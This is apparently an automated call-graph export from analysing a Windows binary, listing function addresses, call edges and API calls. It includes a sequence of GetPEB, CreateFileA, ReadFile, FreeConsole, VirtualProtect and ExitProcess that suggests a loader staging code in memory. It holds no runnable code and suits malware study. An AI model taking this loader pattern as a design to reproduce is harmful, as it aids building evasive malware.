16414->16392 16416 ea4334 16415->16416 16417 ea4366 ReadFile 16416->16417 16416->16420 16418 ea438d 16417->16418 16417->16420 16419 ea4051 33 API calls 16418->16419 16419->16420 16420->16412 16422 ea0efc _Fputc 29 API calls 16421->16422 16423 ea4467 16422->16423 16424 ea4051 33 API calls 16423->16424 16427 ea44b1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16423->16427 16425 ea450e 16424->16425 16426 ea4051 33 API calls 16425->16426 16425->16427 16426->16427 16427->16392 16431 ea407b ___scrt_is_nonwritable_in_current_image 16428->16431 16429 ea406a 16429->16388 16429->16390 16429->16392 16430 ea40be 16432 e9b601 _Fputc 29 API calls 16430->16432 16431->16429 16431->16430 16433 ea4104 16431->16433 16432->16429 16439 ea4ef9 EnterCriticalSection 16433->16439 16435 ea410a 16436 ea412b 16435->16436 16437 ea4194 __fread_nolock 31 API calls 16435->16437 16440 ea418c 16436->16440 16437->16436 16439->16435 16443 ea4f1c LeaveCriticalSection 16440->16443 16442 ea4192 16442->16429 16443->16442 16444->16374 17846 e9430a 17847 e94342 17846->17847 17848 e94313 17846->17848 17848->17847 17851 e9bb66 17848->17851 17850 e94335 17852 e9bb78 17851->17852 17854 e9bb81 ___scrt_uninitialize_crt 17851->17854 17853 e9bce4 ___scrt_uninitialize_crt 68 API calls 17852->17853 17855 e9bb7e 17853->17855 17856 e9bb90 17854->17856 17859 e9be69 17854->17859 17855->17850 17856->17850 17860 e9be75 ___scrt_is_nonwritable_in_current_image 17859->17860 17867 e9875f EnterCriticalSection 17860->17867 17862 e9be83 17863 e9bbc2 ___scrt_uninitialize_crt 68 API calls 17862->17863 17864 e9be94 17863->17864 17868 e9bebd 17864->17868 17867->17862 17871 e98773 LeaveCriticalSection 17868->17871 17870 e9bbb7 17870->17850 17871->17870 16582 e93e04 16583 e93e10 __EH_prolog3_GS 16582->16583 16586 e93e79 16583->16586 16587 e93e60 16583->16587 16592 e93e2a 16583->16592 16599 e9bec9 16586->16599 16596 e935ba 16587->16596 16591 e93e98 16591->16592 16593 e93f6d 16591->16593 16595 e9bec9 45 API calls 16591->16595 16619 e933ee 16591->16619 16623 e9535e 16592->16623 16593->16592 16626 e9cf47 16593->16626 16595->16591 16597 e9bec9 45 API calls 16596->16597 16598 e935c5 16597->16598 16598->16592 16600 e9bed5 ___scrt_is_nonwritable_in_current_image 16599->16600 16601 e9bedf 16600->16601 16602 e9bef7 16600->16602 16603 e9ad6d __dosmaperr 14 API calls 16601->16603 16639 e9875f EnterCriticalSection 16602->16639 16605 e9bee4 16603->16605 16607 e9b458 __strnicoll 29 API calls 16605->16607 16606 e9bf02 16608 ea0efc _Fputc 29 API calls 16606->16608 16611 e9bf1a 16606->16611 16618 e9beef _Fputc 16607->16618 16608->16611 16609 e9bfaa 16640 e9bfe2 16609->16640 16610 e9bf82 16612 e9ad6d __dosmaperr 14 API calls 16610->16612 16611->16609 16611->16610 16614 e9bf87 16612->16614 16617 e9b458 __strnicoll 29 API calls 16614->16617 16615 e9bfb0 16650 e9bfda 16615->16650 16617->16618 16618->16591 16620 e93422 16619->16620 16622 e933fe 16619->16622 16812 e946df 16620->16812 16622->16591 16624 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 16623->16624 16625 e95368 16624->16625 16625->16625 16627 e9cf53 ___scrt_is_nonwritable_in_current_image 16626->16627 16628 e9cf5a 16627->16628 16629 e9cf6f 16627->16629 16630 e9ad6d __dosmaperr 14 API calls 16628->16630 16827 e9875f EnterCriticalSection 16629->16827 16633 e9cf5f 16630->16633 16632 e9cf79 16828 e9cfba 16632->16828 16635 e9b458 __strnicoll 29 API calls 16633->16635 16637 e9cf6a 16635->16637 16637->16593 16639->16606 16641 e9bfee 16640->16641 16643 e9c003 16640->16643 16642 e9ad6d __dosmaperr 14 API calls 16641->16642 16645 e9bff3 16642->16645 16644 e9c012 16643->16644 16653 ea5d52 16643->16653 16644->16615 16647 e9b458 __strnicoll 29 API calls 16645->16647 16649 e9bffe 16647->16649 16649->16615 16811 e98773 LeaveCriticalSection 16650->16811 16652 e9bfe0 16652->16618 16654 ea5d5d 16653->16654 16655 ea5d6a 16654->16655 16656 ea5d82 16654->16656 16657 e9ad6d __dosmaperr 14 API calls 16655->16657 16660 ea5de1 16656->16660 16668 e9c00f 16656->16668 16674 ea7d00 16656->16674 16658 ea5d6f 16657->16658 16659 e9b458 __strnicoll 29 API calls 16658->16659 16659->16668 16662 ea0efc _Fputc 29 API calls 16660->16662 16663 ea5dfa 16662->16663 16679 ea6144 16663->16679 16666 ea0efc _Fputc 29 API calls 16667 ea5e33 16666->16667 16667->16668 16669 ea0efc _Fputc 29 API calls 16667->16669 16668->16615 16670 ea5e41 16669->16670 16670->16668 16671 ea0efc _Fputc 29 API calls 16670->16671 16672 ea5e4f 16671->16672 16673 ea0efc _Fputc 29 API calls 16672->16673 16673->16668 16675 e9f807 __dosmaperr 14 API calls 16674->16675 16676 ea7d1d 16675->16676 16677 e9e4f7 ___free_lconv_mon 14 API calls 16676->16677 16678 ea7d27 16677->16678 16678->16660 16680 ea6150 ___scrt_is_nonwritable_in_current_image 16679->16680 16681 ea6158 16680->16681 16682 ea6173 16680->16682 16683 e9ad80 __dosmaperr 14 API calls 16681->16683 16686 ea618a 16682->16686 16687 ea61c5 16682->16687 16684 ea615d 16683->16684 16685 e9ad6d __dosmaperr 14 API calls 16684->16685 16708 ea5e02 16685->16708 16688 e9ad80 __dosmaperr 14 API calls 16686->16688 16689 ea61ce 16687->16689 16690 ea61e3 16687->16690 16691 ea618f 16688->16691 16692 e9ad80 __dosmaperr 14 API calls 16689->16692 16709 ea4ef9 EnterCriticalSection 16690->16709 16694 e9ad6d __dosmaperr 14 API calls 16691->16694 16695 ea61d3 16692->16695 16697 ea6197 16694->16697 16698 e9ad6d __dosmaperr 14 API calls 16695->16698 16696 ea61e9 16699 ea6208 16696->16699 16700 ea621d 16696->16700 16701 e9b458 __strnicoll 29 API calls 16697->16701 16698->16697 16703 e9ad6d __dosmaperr 14 API calls 16699->16703 16710 ea625d 16700->16710 16701->16708 16705 ea620d 16703->16705 16704 ea6218 16773 ea6255 16704->16773 16706 e9ad80 __dosmaperr 14 API calls 16705->16706 16706->16704 16708->16666 16708->16668 16709->16696 16711 ea626f 16710->16711 16712 ea6287 16710->16712 16713 e9ad80 __dosmaperr 14 API calls 16711->16713 16714 ea65c9 16712->16714 16719 ea62ca 16712->16719 16715 ea6274 16713->16715 16716 e9ad80 __dosmaperr 14 API calls 16714->16716 16717 e9ad6d __dosmaperr 14 API calls 16715->16717 16718 ea65ce 16716->16718 16722 ea627c 16717->16722 16720 e9ad6d __dosmaperr 14 API calls 16718->16720 16721 ea62d5 16719->16721 16719->16722 16727 ea6305 16719->16727 16723 ea62e2 16720->16723 16724 e9ad80 __dosmaperr 14 API calls 16721->16724 16722->16704 16728 e9b458 __strnicoll 29 API calls 16723->16728 16725 ea62da 16724->16725 16726 e9ad6d __dosmaperr 14 API calls 16725->16726 16726->16723 16729 ea631e 16727->16729 16730 ea632b 16727->16730 16731 ea6359 16727->16731 16728->16722 16729->16730 16735 ea6347 16729->16735 16732 e9ad80 __dosmaperr 14 API calls 16730->16732 16733 e9e531 __fread_nolock 15 API calls 16731->16733 16734 ea6330 16732->16734 16736 ea636a 16733->16736 16737 e9ad6d __dosmaperr 14 API calls 16734->16737 16776 ea8994 16735->16776 16739 e9e4f7 ___free_lconv_mon 14 API calls 16736->16739 16740 ea6337 16737->16740 16742 ea6373 16739->16742 16743 e9b458 __strnicoll 29 API calls 16740->16743 16741 ea64a5 16744 ea6519 16741->16744 16745 ea64be GetConsoleMode 16741->16745 16746 e9e4f7 ___free_lconv_mon 14 API calls 16742->16746 16772 ea6342 __fread_nolock 16743->16772 16747 ea651d ReadFile 16744->16747 16745->16744 16748 ea64cf 16745->16748 16749 ea637a 16746->16749 16750 ea6591 GetLastError 16747->16750 16751 ea6535 16747->16751 16748->16747 16752 ea64d5 ReadConsoleW 16748->16752 16753 ea639f 16749->16753 16754 ea6384 16749->16754 16755 ea659e 16750->16755 16756 ea64f5 16750->16756 16751->16750 16757 ea650e 16751->16757 16752->16757 16759 ea64ef GetLastError 16752->16759 16758 ea3ff3 __fread_nolock 31 API calls 16753->16758 16761 e9ad6d __dosmaperr 14 API calls 16754->16761 16762 e9ad6d __dosmaperr 14 API calls 16755->16762 16764 e9ad93 __dosmaperr 14 API calls 16756->16764 16756->16772 16767 ea655a 16757->16767 16768 ea6571 16757->16768 16757->16772 16758->16735 16759->16756 16760 e9e4f7 ___free_lconv_mon 14 API calls 16760->16722 16765 ea6389 16761->16765 16763 ea65a3 16762->16763 16766 e9ad80 __dosmaperr 14 API calls 16763->16766 16764->16772 16769 e9ad80 __dosmaperr 14 API calls 16765->16769 16766->16772 16785 ea6666 16767->16785 16768->16772 16798 ea690a 16768->16798 16769->16772 16772->16760 16810 ea4f1c LeaveCriticalSection 16773->16810 16775 ea625b 16775->16708 16777 ea89ae 16776->16777 16778 ea89a1 16776->16778 16781 ea89ba 16777->16781 16782 e9ad6d __dosmaperr 14 API calls 16777->16782 16779 e9ad6d __dosmaperr 14 API calls 16778->16779 16780 ea89a6 16779->16780 16780->16741 16781->16741 16783 ea89db 16782->16783 16784 e9b458 __strnicoll 29 API calls 16783->16784 16784->16780 16804 ea67bd 16785->16804 16788 e9e57f __strnicoll MultiByteToWideChar 16789 ea677a 16788->16789 16792 ea6783 GetLastError 16789->16792 16795 ea66ae 16789->16795 16790 ea6708 16796 ea66c2 16790->16796 16797 ea3ff3 __fread_nolock 31 API calls 16790->16797 16791 ea66f8 16793 e9ad6d __dosmaperr 14 API calls 16791->16793 16794 e9ad93 __dosmaperr 14 API calls 16792->16794 16793->16795 16794->16795 16795->16772 16796->16788 16797->16796 16799 ea6944 16798->16799 16800 ea69da ReadFile 16799->16800 16801 ea69d5 16799->16801 16800->16801 16802 ea69f7 16800->16802 16801->16772 16802->16801 16803 ea3ff3 __fread_nolock 31 API calls 16802->16803 16803->16801 16805 ea67f1 16804->16805 16806 ea6862 ReadFile 16805->16806 16807 ea667d 16805->16807 16806->16807 16808 ea687b 16806->16808 16807->16790 16807->16791 16807->16795 16807->16796 16808->16807 16809 ea3ff3 __fread_nolock 31 API calls 16808->16809 16809->16807 16810->16775 16811->16652 16813 e94793 16812->16813 16815 e94703 16812->16815 16814 e91860 std::ios_base::_Init 31 API calls 16813->16814 16816 e94798 16814->16816 16819 e947f6 16815->16819 16818 e94720 _Yarn _Deallocate 16818->16622 16820 e94800 16819->16820 16821 e94802 16819->16821 16820->16818 16822 e9480a 16821->16822 16823 e94811 16821->16823 16824 e9186a std::ios_base::_Init 31 API calls 16822->16824 16825 e92952 std::ios_base::_Init 16 API calls 16823->16825 16826 e9480f 16824->16826 16825->16826 16826->16818 16827->16632 16829 e9cfd2 16828->16829 16831 e9d042 16828->16831 16830 ea0efc _Fputc 29 API calls 16829->16830 16836 e9cfd8 16830->16836 16832 ea7d00 __fread_nolock 14 API calls 16831->16832 16833 e9cf87 16831->16833 16832->16833 16839 e9cfb2 16833->16839 16834 e9d02a 16835 e9ad6d __dosmaperr 14 API calls 16834->16835 16837 e9d02f 16835->16837 16836->16831 16836->16834 16838 e9b458 __strnicoll 29 API calls 16837->16838 16838->16833 16842 e98773 LeaveCriticalSection 16839->16842 16841 e9cfb8 16841->16637 16842->16841 14708 e91614 GetPEB 14730 e91098 14708->14730 14711 e91680 GetFileSize 14712 e91804 CloseHandle 14711->14712 14713 e91694 14711->14713 14721 e91828 14712->14721 14716 e9169c ReadFile 14713->14716 14714 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14715 e91836 14714->14715 14717 e916b9 CloseHandle 14716->14717 14718 e917fb 14716->14718 14719 e917f9 14717->14719 14729 e916d0 _Yarn error_info_injector _strlen 14717->14729 14718->14712 14741 e9155c 14719->14741 14721->14714 14722 e91840 14773 e91860 14722->14773 14724 e91845 14775 e9b468 14724->14775 14729->14719 14729->14722 14729->14724 14755 e9186a 14729->14755 14761 e92952 14729->14761 14739 e910c1 _Yarn error_info_injector _strlen 14730->14739 14740 e9120e 14730->14740 14731 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14732 e91227 CreateFileA 14731->14732 14732->14711 14732->14721 14733 e91231 14734 e91860 std::ios_base::_Init 31 API calls 14733->14734 14735 e91236 14734->14735 14736 e9b468 std::ios_base::_Init 29 API calls 14735->14736 14736->14735 14737 e9186a std::ios_base::_Init 31 API calls 14737->14739 14738 e92952 std::ios_base::_Init 16 API calls 14738->14739 14739->14733 14739->14735 14739->14737 14739->14738 14739->14740 14740->14731 14742 e91098 31 API calls 14741->14742 14743 e91582 FreeConsole 14742->14743 14780 e9123b 14743->14780 14746 e9123b 104 API calls 14747 e915b9 14746->14747 14748 e91098 31 API calls 14747->14748 14749 e915cc VirtualProtect 14748->14749 14750 e915dd 14749->14750 14751 e915f1 ExitProcess 14749->14751 14752 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14750->14752 14753 e915e7 14752->14753 14753->14721 14756 e9188b 14755->14756 14757 e91873 14755->14757 15396 e91890 14756->15396 14758 e92952 std::ios_base::_Init 16 API calls 14757->14758 14760 e9187c 14758->14760 14760->14729 14764 e92957 14761->14764 14762 e9c994 _Yarn 15 API calls 14762->14764 14763 e92971 14763->14729 14764->14762 14764->14763 14765 e98f08 std::ios_base::_Init 2 API calls 14764->14765 14766 e92973 14764->14766 14765->14764 14767 e94a6f std::ios_base::_Init 14766->14767 14769 e9297d Concurrency::cancel_current_task 14766->14769 14768 e95aba Concurrency::cancel_current_task RaiseException 14767->14768 14770 e94a8b 14768->14770 14771 e95aba Concurrency::cancel_current_task RaiseException 14769->14771 14772 e931cf 14771->14772 15401 e931d0 14773->15401 14776 e9b6a7 __strnicoll 29 API calls 14775->14776 14777 e9b477 14776->14777 14778 e9b485 __Getctype 11 API calls 14777->14778 14779 e9b484 14778->14779 14785 e91263 14780->14785 14781 e91355 14783 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14781->14783 14782 e912c2 KiUserExceptionDispatcher 14782->14785 14784 e91363 14783->14784 14784->14746 14785->14781 14785->14782 14788 e9136e 14785->14788 14804 e91533 14785->14804 14789 e9138d _strlen 14788->14789 14811 e9197e 14789->14811 14791 e91444 14815 e9408b 14791->14815 14793 e91515 14840 e91a10 14793->14840 14795 e914c0 14825 e91ab6 14795->14825 14797 e913ad 14797->14791 14797->14795 14819 e919d8 14797->14819 14799 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14801 e91529 14799->14801 14800 e91466 14800->14795 14802 e919d8 69 API calls 14800->14802 14801->14785 14802->14800 15135 e923c4 14804->15135 14809 e91a3a 40 API calls 14810 e91558 14809->14810 14810->14785 14812 e91995 14811->14812 14813 e919a6 14812->14813 14844 e91a3a 14812->14844 14813->14797 14817 e940ad _Yarn 14815->14817 14818 e9409a 14815->14818 14817->14818 14854 e9c578 14817->14854 14818->14800 14820 e919e5 14819->14820 14821 e919ee 14820->14821 14928 e93c29 14820->14928 14937 e93c1b 14820->14937 14950 e93c0b 14820->14950 14821->14797 14826 e91ae9 14825->14826 14827 e91ad6 14825->14827 14829 e91af9 14826->14829 14996 e95aba 14826->14996 14828 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14827->14828 14830 e91ae1 14828->14830 14999 e91c57 14829->14999 14830->14793 14836 e95aba Concurrency::cancel_current_task RaiseException 14837 e91b3a 14836->14837 15010 e91e48 14837->15010 14841 e91a18 14840->14841 14842 e9151e 14841->14842 15131 e922fe 14841->15131 14842->14799 14845 e91a5a 14844->14845 14846 e91aa2 14844->14846 14847 e9197e 40 API calls 14845->14847 14848 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14846->14848 14849 e91a64 14847->14849 14850 e91aad 14848->14850 14851 e91a9b 14849->14851 14853 e91ab6 std::ios_base::_Init 40 API calls 14849->14853 14850->14813 14852 e91a10 40 API calls 14851->14852 14852->14846 14853->14851 14855 e9c58b _Fputc 14854->14855 14858 e9c759 14855->14858 14857 e9c5a0 _Fputc 14857->14818 14859 e9c78f 14858->14859 14860 e9c767 14858->14860 14859->14857 14860->14859 14861 e9c774 14860->14861 14862 e9c796 14860->14862 14864 e9b601 _Fputc 29 API calls 14861->14864 14866 e9c81c 14862->14866 14864->14859 14867 e9c828 ___scrt_is_nonwritable_in_current_image 14866->14867 14874 e9875f EnterCriticalSection 14867->14874 14869 e9c836 14875 e9c7d0 14869->14875 14874->14869 14885 ea0bb7 14875->14885 14882 e9c86b 14927 e98773 LeaveCriticalSection 14882->14927 14884 e9c7ce 14884->14857 14906 ea0c62 14885->14906 14887 e9c7e8 14892 e9c5b2 14887->14892 14888 ea0bc8 _Fputc 14888->14887 14889 e9e531 __fread_nolock 15 API calls 14888->14889 14890 ea0c21 14889->14890 14891 e9e4f7 ___free_lconv_mon 14 API calls 14890->14891 14891->14887 14895 e9c5c4 14892->14895 14897 e9c5ed 14892->14897 14893 e9c5d2 14894 e9b601 _Fputc 29 API calls 14893->14894 14894->14897 14895->14893 14895->14897 14901 e9c608 _Yarn 14895->14901 14902 ea0ca0 14897->14902 14898 e9bc27 ___scrt_uninitialize_crt 64 API calls 14898->14901 14899 ea0efc _Fputc 29 API calls 14899->14901 14900 ea549f _Fputc 64 API calls 14900->14901 14901->14897 14901->14898 14901->14899 14901->14900 14914 ea5eec 14901->14914 14903 ea0cab 14902->14903 14904 e9c812 14902->14904 14903->14904 14905 e9bc27 ___scrt_uninitialize_crt 64 API calls 14903->14905 14904->14882 14905->14904 14909 ea0c6e _Fputc 14906->14909 14907 ea0c9c 14907->14888 14908 ea0c98 14908->14888 14909->14907 14909->14908 14910 ea0efc _Fputc 29 API calls 14909->14910 14911 ea0c89 14910->14911 14912 ea8994 __fread_nolock 29 API calls 14911->14912 14913 ea0c8f 14912->14913 14913->14888 14915 ea5f7c 14914->14915 14916 ea0efc _Fputc 29 API calls 14915->14916 14918 ea5f89 14916->14918 14917 ea5f95 14917->14901 14918->14917 14919 ea5ef7 _Fputc 31 API calls 14918->14919 14922 ea5fe1 14918->14922 14919->14922 14920 ea6043 14921 ea6072 _Fputc 64 API calls 14920->14921 14924 ea6054 14921->14924 14922->14917 14922->14920 14923 ea0c62 _Fputc 29 API calls 14922->14923 14925 ea6036 14923->14925 14924->14901 14925->14920 14926 ea7d00 __fread_nolock 14 API calls 14925->14926 14926->14920 14927->14884 14932 e93c45 14928->14932 14933 e93c4c 14928->14933 14929 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14930 e93d31 14929->14930 14930->14821 14932->14929 14933->14932 14934 e93cf2 14933->14934 14935 e93c92 14933->14935 14934->14932 14936 e9c578 69 API calls 14934->14936 14935->14932 14961 e935da 14935->14961 14936->14932 14938 e93bf9 14937->14938 14939 e93c22 14937->14939 14938->14937 14942 e93c76 14938->14942 14994 e98773 LeaveCriticalSection 14939->14994 14941 e93c27 14941->14821 14942->14821 14943 e93cf2 14942->14943 14944 e93cd3 14942->14944 14945 e9c578 69 API calls 14943->14945 14949 e93ce4 14943->14949 14947 e935da _Fputc 68 API calls 14944->14947 14944->14949 14945->14949 14946 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14948 e93d31 14946->14948 14947->14949 14948->14821 14949->14946 14951 e93c12 14950->14951 14956 e93c17 14950->14956 14995 e9875f EnterCriticalSection 14951->14995 14953 e93c62 14954 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14953->14954 14955 e93d31 14954->14955 14955->14821 14956->14821 14956->14953 14958 e93cf2 14956->14958 14959 e93c92 14956->14959 14957 e935da _Fputc 68 API calls 14957->14953 14958->14953 14960 e9c578 69 API calls 14958->14960 14959->14953 14959->14957 14960->14953 14964 e9c079 14961->14964 14963 e935ea 14963->14932 14965 e9c08c _Fputc 14964->14965 14968 e9c0da 14965->14968 14967 e9c09b _Fputc 14967->14963 14969 e9c0e6 ___scrt_is_nonwritable_in_current_image 14968->14969 14970 e9c0ef 14969->14970 14971 e9c113 14969->14971 14972 e9b601 _Fputc 29 API calls 14970->14972 14984 e9875f EnterCriticalSection 14971->14984 14981 e9c108 _Fputc 14972->14981 14974 e9c11c 14975 e9c131 14974->14975 14976 ea0efc _Fputc 29 API calls 14974->14976 14977 e9c19d 14975->14977 14978 e9c1ce 14975->14978 14976->14975 14979 e9b601 _Fputc 29 API calls 14977->14979 14985 e9c0ad 14978->14985 14979->14981 14981->14967 14982 e9c1da 14990 e9c206 14982->14990 14984->14974 14986 e9c0bb 14985->14986 14987 e9c0cc 14985->14987 14988 ea5eec _Fputc 66 API calls 14986->14988 14987->14982 14989 e9c0c7 14988->14989 14989->14982 14993 e98773 LeaveCriticalSection 14990->14993 14992 e9c20c 14992->14981 14993->14992 14994->14941 14995->14956 14997 e95b02 RaiseException 14996->14997 14998 e95ad4 14996->14998 14997->14829 14998->14997 15000 e91c7a 14999->15000 15001 e91b17 14999->15001 15027 e929d4 AcquireSRWLockExclusive 15000->15027 15007 e91b3a 15001->15007 15003 e91c84 15003->15001 15032 e92a89 15003->15032 15008 e91e48 std::ios_base::_Init 40 API calls 15007->15008 15009 e91b2f 15008->15009 15009->14836 15011 e91e75 _strlen 15010->15011 15012 e91f5e 15011->15012 15013 e91e80 15011->15013 15014 e91860 std::ios_base::_Init 31 API calls 15012->15014 15016 e91ec8 15013->15016 15017 e91ed0 15013->15017 15021 e91e8f _Yarn 15013->15021 15015 e91f63 15014->15015 15019 e9b468 std::ios_base::_Init 29 API calls 15015->15019 15020 e9186a std::ios_base::_Init 31 API calls 15016->15020 15018 e92952 std::ios_base::_Init 16 API calls 15017->15018 15018->15021 15019->15015 15020->15021 15071 e91f68 15021->15071 15024 e91f30 error_info_injector 15025 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 15024->15025 15026 e91b4f 15025->15026 15026->14793 15028 e929e8 15027->15028 15029 e929ed ReleaseSRWLockExclusive 15028->15029 15036 e92a74 SleepConditionVariableSRW 15028->15036 15029->15003 15037 e92a9e 15032->15037 15035 e92a23 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 15035->15001 15036->15028 15038 e92aad 15037->15038 15039 e92ab4 15037->15039 15043 e9aac5 15038->15043 15046 e9aa54 15039->15046 15042 e91c9a 15042->15035 15044 e9aa54 std::ios_base::_Init 32 API calls 15043->15044 15045 e9aad7 15044->15045 15045->15042 15049 e9acb7 15046->15049 15050 e9acc3 ___scrt_is_nonwritable_in_current_image 15049->15050 15057 e9b750 EnterCriticalSection 15050->15057 15052 e9acd1 15058 e9aadb 15052->15058 15054 e9acde 15068 e9ad06 15054->15068 15057->15052 15059 e9aaf6 15058->15059 15060 e9ab69 std::_Lockit::_Lockit 15058->15060 15059->15060 15061 e9ab49 15059->15061 15062 ea3f46 std::ios_base::_Init 32 API calls 15059->15062 15060->15054 15061->15060 15063 ea3f46 std::ios_base::_Init 32 API calls 15061->15063 15064 e9ab3f 15062->15064 15065 e9ab5f 15063->15065 15066 e9e4f7 ___free_lconv_mon 14 API calls 15064->15066 15067 e9e4f7 ___free_lconv_mon 14 API calls 15065->15067 15066->15061 15067->15060 15069 e9b767 std::_Lockit::~_Lockit LeaveCriticalSection 15068->15069 15070 e9aa85 15069->15070 15070->15042 15072 e91fa0 15071->15072 15073 e91faa 15072->15073 15074 e920be 15072->15074 15076 e91fe8 15073->15076 15077 e91ff0 15073->15077 15083 e91fb2 _Yarn 15073->15083 15075 e91860 std::ios_base::_Init 31 API calls 15074->15075 15078 e920c3 15075->15078 15079 e9186a std::ios_base::_Init 31 API calls 15076->15079 15080 e92952 std::ios_base::_Init 16 API calls 15077->15080 15082 e9b468 std::ios_base::_Init 29 API calls 15078->15082 15079->15083 15080->15083 15082->15078 15090 e920c8 15083->15090 15087 e92085 error_info_injector 15088 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 15087->15088 15089 e91f0d 15088->15089 15089->15015 15089->15024 15091 e920f8 15090->15091 15092 e920ea 15090->15092 15094 e9218a std::ios_base::_Init 40 API calls 15091->15094 15109 e9218a 15092->15109 15095 e9211b 15094->15095 15098 e9213f error_info_injector 15095->15098 15099 e92185 15095->15099 15096 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 15097 e92029 15096->15097 15101 e96097 15097->15101 15098->15096 15100 e9b468 std::ios_base::_Init 29 API calls 15099->15100 15100->15099 15102 e960a4 15101->15102 15108 e92059 15101->15108 15102->15108 15124 e9c994 15102->15124 15105 e9e16c ___std_exception_copy 29 API calls 15107 e960d1 15105->15107 15106 e9c522 _Yarn 14 API calls 15106->15108 15107->15106 15108->15078 15108->15087 15110 e921a9 15109->15110 15120 e9224f _Yarn error_info_injector 15109->15120 15111 e921b8 15110->15111 15112 e922f3 15110->15112 15113 e921e3 15111->15113 15116 e921e9 _Yarn 15111->15116 15118 e922e8 15111->15118 15114 e91860 std::ios_base::_Init 31 API calls 15112->15114 15115 e9186a std::ios_base::_Init 31 API calls 15113->15115 15114->15116 15115->15116 15117 e9b468 std::ios_base::_Init 29 API calls 15116->15117 15116->15120 15122 e922fd 15117->15122 15119 e92952 std::ios_base::_Init 16 API calls 15118->15119 15119->15116 15120->15091 15121 e92339 15121->15091 15122->15121 15123 e91ab6 std::ios_base::_Init 40 API calls 15122->15123 15123->15121 15129 e9e531 __dosmaperr 15124->15129 15125 e9e56f 15127 e9ad6d __dosmaperr 14 API calls 15125->15127 15126 e9e55a RtlAllocateHeap 15128 e960c1 15126->15128 15126->15129 15127->15128 15128->15105 15128->15107 15129->15125 15129->15126 15130 e98f08 std::ios_base::_Init 2 API calls 15129->15130 15130->15129 15132 e92339 15131->15132 15133 e9230b 15131->15133 15132->14842 15133->15132 15134 e91ab6 std::ios_base::_Init 40 API calls 15133->15134 15134->15132 15136 e923ea 15135->15136 15152 e9242b 15136->15152 15138 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 15139 e91546 15138->15139 15141 e9233c 15139->15141 15142 e9197e 40 API calls 15141->15142 15143 e92358 15142->15143 15144 e919d8 69 API calls 15143->15144 15145 e92372 15143->15145 15144->15145 15146 e91ab6 std::ios_base::_Init 40 API calls 15145->15146 15147 e923a7 15146->15147 15148 e91a10 40 API calls 15147->15148 15149 e923ae 15148->15149 15150 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 15149->15150 15151 e91551 15150->15151 15151->14809 15169 e92cd9 15152->15169 15156 e9245e 15157 e9248c 15156->15157 15183 e9254a 15156->15183 15201 e92d0a 15157->15201 15160 e924a8 15162 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 15160->15162 15165 e923f0 15162->15165 15163 e924bc 15208 e925d6 15163->15208 15164 e92483 15195 e92d7d 15164->15195 15165->15138 15170 e92ce8 15169->15170 15171 e92cef 15169->15171 15219 e9b77e 15170->15219 15173 e9244b 15171->15173 15224 e951f8 EnterCriticalSection 15171->15224 15175 e924c2 15173->15175 15176 e924d8 15175->15176 15182 e924fc 15175->15182 15178 e92cd9 std::_Lockit::_Lockit 7 API calls 15176->15178 15177 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 15179 e92509 